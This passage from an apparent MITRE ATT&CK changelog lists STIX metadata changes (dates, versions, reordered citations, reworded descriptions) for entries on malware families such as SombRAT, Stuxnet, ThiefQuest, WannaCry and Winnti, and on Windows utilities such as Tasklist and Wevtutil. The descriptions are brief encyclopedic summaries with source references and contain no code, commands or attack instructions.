| external_references[4]['description'] | Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021. | Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021. |
| external_references[4]['url'] | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf | https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf |
| external_references[5]['source_name'] | FireEye APT41 Aug 2019 | Kaspersky ShadowPad Aug 2017 |
| external_references[5]['description'] | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. | Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021. |
| external_references[5]['url'] | https://content.fireeye.com/apt-41/rpt-apt41 | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the SolarWinds cyber intrusion campaign.(Citation: MSTIC NOBELIUM Mar 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 22:30:19.071000+00:00 | 2022-10-18 23:33:55.403000+00:00 |
| Old Description | New Description |
|---|---|
| [SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been in use since at least 2019. [SombRAT](https://attack.mitre.org/software/S0615) has been used to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021) | [SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 23:39:53.415000+00:00 | 2022-10-05 16:33:54.170000+00:00 |
| description | [SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been in use since at least 2019. [SombRAT](https://attack.mitre.org/software/S0615) has been used to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021) | [SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021) |
| external_references[1]['source_name'] | BlackBerry CostaRicto November 2020 | CISA AR21-126A FIVEHANDS May 2021 |
| external_references[1]['description'] | The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021. | CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021. |
| external_references[1]['url'] | https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced | https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a |
| external_references[3]['source_name'] | CISA AR21-126A FIVEHANDS May 2021 | BlackBerry CostaRicto November 2020 |
| external_references[3]['description'] | CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021. | The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021. |
| external_references[3]['url'] | https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a | https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced |
| x_mitre_version | 1.0 | 1.2 |
| Description |
|---|
| [Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 21:50:58.905000+00:00 | 2022-10-20 20:31:32.664000+00:00 |
| external_references[2]['source_name'] | Symantec W.32 Stuxnet Dossier | CISA ICS Advisory ICSA-10-272-01 |
| external_references[2]['description'] | Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020. | CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020. |
| external_references[2]['url'] | https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf | https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01 |
| external_references[3]['source_name'] | CISA ICS Advisory ICSA-10-272-01 | ESET Stuxnet Under the Microscope |
| external_references[3]['description'] | CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020. | Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020. |
| external_references[3]['url'] | https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01 | https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf |
| external_references[4]['source_name'] | ESET Stuxnet Under the Microscope | Symantec W.32 Stuxnet Dossier |
| external_references[4]['description'] | Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020. | Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020. |
| external_references[4]['url'] | https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf | https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf |
| x_mitre_version | 1.0 | 1.2 |
| Description |
|---|
| [Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | ['Windows'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-12 21:29:48.567000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | systeminfo.exe | |
| Description |
|---|
| [TEXTMATE](https://attack.mitre.org/software/S0146) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://attack.mitre.org/software/S0145) in February 2017. (Citation: FireEye FIN7 March 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:19:25.928000+00:00 | 2022-07-20 20:06:44.708000+00:00 |
| external_references[3]['source_name'] | FireEye FIN7 March 2017 | Cisco DNSMessenger March 2017 |
| external_references[3]['description'] | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. | Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html | http://blog.talosintelligence.com/2017/03/dnsmessenger.html |
| external_references[4]['source_name'] | Cisco DNSMessenger March 2017 | FireEye FIN7 March 2017 |
| external_references[4]['description'] | Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017. | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. |
| external_references[4]['url'] | http://blog.talosintelligence.com/2017/03/dnsmessenger.html | https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html |
| Description |
|---|
| [TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets.(Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019). [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435) though more recent reporting indicates a separation between the two.(Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-07 14:05:07.519000+00:00 | 2022-04-15 11:32:25.171000+00:00 |
| external_references[1]['source_name'] | JPCert TSCookie March 2018 | JPCert PLEAD Downloader June 2018 |
| external_references[1]['description'] | Tomonaga, S.. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020. | Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020. |
| external_references[2]['source_name'] | JPCert BlackTech Malware September 2019 | JPCert TSCookie March 2018 |
| external_references[2]['description'] | Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020. | Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020. |
| external_references[2]['url'] | https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html | https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html |
| external_references[3]['source_name'] | JPCert PLEAD Downloader June 2018 | JPCert BlackTech Malware September 2019 |
| external_references[3]['description'] | Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020. | Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020. |
| external_references[3]['url'] | https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html | https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html |
| Description |
|---|
| The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | ['Windows'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-12 21:30:23.536000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [ThiefQuest](https://attack.mitre.org/software/S0595) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://attack.mitre.org/software/S0595) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.(Citation: Reed thiefquest fake ransom) Even though [ThiefQuest](https://attack.mitre.org/software/S0595) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-05 01:47:00.880000+00:00 | 2022-04-16 15:01:37.957000+00:00 |
| external_references[2]['source_name'] | MacRansom.K | EvilQuest |
| external_references[2]['description'] | (Citation: SentinelOne EvilQuest Ransomware Spyware 2020) | (Citation: Reed thiefquest fake ransom) |
| external_references[3]['source_name'] | EvilQuest | MacRansom.K |
| external_references[3]['description'] | (Citation: Reed thiefquest fake ransom) | (Citation: SentinelOne EvilQuest Ransomware Spyware 2020) |
| external_references[4]['source_name'] | Reed thiefquest fake ransom | wardle evilquest partii |
| external_references[4]['description'] | Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 18, 2021. | Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021. |
| external_references[4]['url'] | https://blog.malwarebytes.com/detections/osx-thiefquest/ | https://objective-see.com/blog/blog_0x60.html |
| external_references[5]['source_name'] | wardle evilquest partii | SentinelOne EvilQuest Ransomware Spyware 2020 |
| external_references[5]['description'] | Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021. | Phil Stokes. (2020, July 8). “EvilQuest” Rolls Ransomware, Spyware & Data Theft Into One. Retrieved April 1, 2021. |
| external_references[5]['url'] | https://objective-see.com/blog/blog_0x60.html | https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/ |
| external_references[6]['source_name'] | reed thiefquest ransomware analysis | Reed thiefquest fake ransom |
| external_references[6]['description'] | Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021. | Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 18, 2021. |
| external_references[6]['url'] | https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/ | https://blog.malwarebytes.com/detections/osx-thiefquest/ |
| external_references[7]['source_name'] | SentinelOne EvilQuest Ransomware Spyware 2020 | reed thiefquest ransomware analysis |
| external_references[7]['description'] | Phil Stokes. (2020, July 8). “EvilQuest” Rolls Ransomware, Spyware & Data Theft Into One. Retrieved April 1, 2021. | Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021. |
| external_references[7]['url'] | https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/ | https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/ |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [TinyZBot](https://attack.mitre.org/software/S0004) is a bot written in C# that was developed by [Cleaver](https://attack.mitre.org/groups/G0003). (Citation: Cylance Cleaver) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-21 16:41:34.655000+00:00 | 2022-07-22 18:37:22.180000+00:00 |
| Description |
|---|
| [Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-05-13 22:59:15.727000+00:00 | 2022-10-05 16:37:49.999000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY ) | [Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY ) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-14 22:38:11.328000+00:00 | 2022-04-19 14:57:44.862000+00:00 |
| description | [Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY ) | [Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY ) |
| external_references[3]['source_name'] | Symantec Dragonfly | Dragos DYMALLOY |
| external_references[3]['description'] | Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016. | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. |
| external_references[3]['url'] | http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf | https://www.dragos.com/threat/dymalloy/ |
| external_references[5]['source_name'] | Dragos DYMALLOY | Symantec Dragonfly |
| external_references[5]['description'] | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. | Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016. |
| external_references[5]['url'] | https://www.dragos.com/threat/dymalloy/ | https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments |
| x_mitre_version | 2.0 | 3.0 |
| Old Description | New Description |
|---|---|
| [USBStealer](https://attack.mitre.org/software/S0136) is malware that has used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy) | [USBStealer](https://attack.mitre.org/software/S0136) is malware that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-18 16:11:07.955000+00:00 | 2022-04-19 22:53:27.639000+00:00 |
| description | [USBStealer](https://attack.mitre.org/software/S0136) is malware that has used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy) | [USBStealer](https://attack.mitre.org/software/S0136) is malware that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy) |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-05-13 22:59:51.283000+00:00 | 2022-04-25 14:00:00.188000+00:00 |
| Description |
|---|
| [Waterbear](https://attack.mitre.org/software/S0579) is modular malware attributed to [BlackTech](https://attack.mitre.org/groups/G0098) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.(Citation: Trend Micro Waterbear December 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-24 20:33:05.198000+00:00 | 2022-03-25 16:46:35.932000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-21 18:03:13.205000+00:00 | 2022-10-13 17:45:16.377000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 06:31:19.173000+00:00 | 2022-04-20 22:03:11.833000+00:00 |
| Old Description | New Description |
|---|---|
| [Winnti for Windows](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019) | [Winnti for Windows](https://attack.mitre.org/software/S0141) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)(Citation: 401 TRG Winnti Umbrella May 2018). The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-05-04 12:29:49.081000+00:00 | 2022-04-15 16:38:19.439000+00:00 |
| description | [Winnti for Windows](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019) | [Winnti for Windows](https://attack.mitre.org/software/S0141) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)(Citation: 401 TRG Winnti Umbrella May 2018). The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019) |
| external_references[1]['source_name'] | Kaspersky Winnti April 2013 | Microsoft Winnti Jan 2017 |
| external_references[1]['description'] | Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017. | Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017. |
| external_references[1]['url'] | https://securelist.com/winnti-more-than-just-a-game/37029/ | https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/ |
| external_references[2]['source_name'] | Microsoft Winnti Jan 2017 | Chronicle Winnti for Linux May 2019 |
| external_references[2]['description'] | Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017. | Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020. |
| external_references[2]['url'] | https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/ | https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a |
